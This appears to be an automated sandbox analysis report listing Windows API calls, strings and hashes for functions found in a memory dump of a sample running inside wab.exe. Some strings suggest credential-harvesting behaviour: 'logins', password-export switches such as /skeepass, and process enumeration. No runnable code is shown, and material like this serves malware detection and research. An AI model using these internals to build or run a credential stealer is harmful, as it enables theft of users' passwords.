                                                                                                                                                • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                • API String ID: 2899246560-1542517562
                                                                                                                                                • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                  • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                  • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                  • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                • API String ID: 3330709923-517860148
                                                                                                                                                • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                • memset.MSVCRT ref: 0040806A
                                                                                                                                                • memset.MSVCRT ref: 0040807F
                                                                                                                                                • _wtoi.MSVCRT ref: 004081AF
                                                                                                                                                • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                • memset.MSVCRT ref: 004081E4
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                  • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                                                                                                                  • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                                                                                                                • String ID: logins$null
                                                                                                                                                • API String ID: 3492182834-2163367763
                                                                                                                                                • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                • memset.MSVCRT ref: 004085CF
                                                                                                                                                • memset.MSVCRT ref: 004085F1
                                                                                                                                                • memset.MSVCRT ref: 00408606
                                                                                                                                                • strcmp.MSVCRT ref: 00408645
                                                                                                                                                • _mbscpy.MSVCRT ref: 004086DB
                                                                                                                                                • _mbscpy.MSVCRT ref: 004086FA
                                                                                                                                                • memset.MSVCRT ref: 0040870E
                                                                                                                                                • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                                                                                                                • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                • String ID: ---
                                                                                                                                                • API String ID: 3437578500-2854292027
                                                                                                                                                • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0041087D
                                                                                                                                                • memset.MSVCRT ref: 00410892
                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1010922700-0
                                                                                                                                                • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                • malloc.MSVCRT ref: 004186B7
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                                                                                                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                • malloc.MSVCRT ref: 004186FE
                                                                                                                                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@$FullNamePath$malloc$Version
                                                                                                                                                • String ID: |A
                                                                                                                                                • API String ID: 4233704886-1717621600
                                                                                                                                                • Opcode ID: 120bca0df7996060a851268a0569be7b62d1400f73c55317773b03da867e4687
                                                                                                                                                • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                • Opcode Fuzzy Hash: 120bca0df7996060a851268a0569be7b62d1400f73c55317773b03da867e4687
                                                                                                                                                • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                • API String ID: 2081463915-1959339147
                                                                                                                                                • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                • API String ID: 2012295524-70141382
                                                                                                                                                • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                • API String ID: 667068680-3953557276
                                                                                                                                                • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                • memcpy.MSVCRT ref: 0041234D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1700100422-0
                                                                                                                                                • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 552707033-0
                                                                                                                                                • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                                                                                                                • memcpy.MSVCRT ref: 0040C11B
                                                                                                                                                • strchr.MSVCRT ref: 0040C140
                                                                                                                                                • strchr.MSVCRT ref: 0040C151
                                                                                                                                                • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                • memset.MSVCRT ref: 0040C17A
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                • String ID: 4$h
                                                                                                                                                • API String ID: 4066021378-1856150674
                                                                                                                                                • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_snwprintf
                                                                                                                                                • String ID: %%0.%df
                                                                                                                                                • API String ID: 3473751417-763548558
                                                                                                                                                • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                • GetParent.USER32(?), ref: 00406136
                                                                                                                                                • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                • String ID: A
                                                                                                                                                • API String ID: 2892645895-3554254475
                                                                                                                                                • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
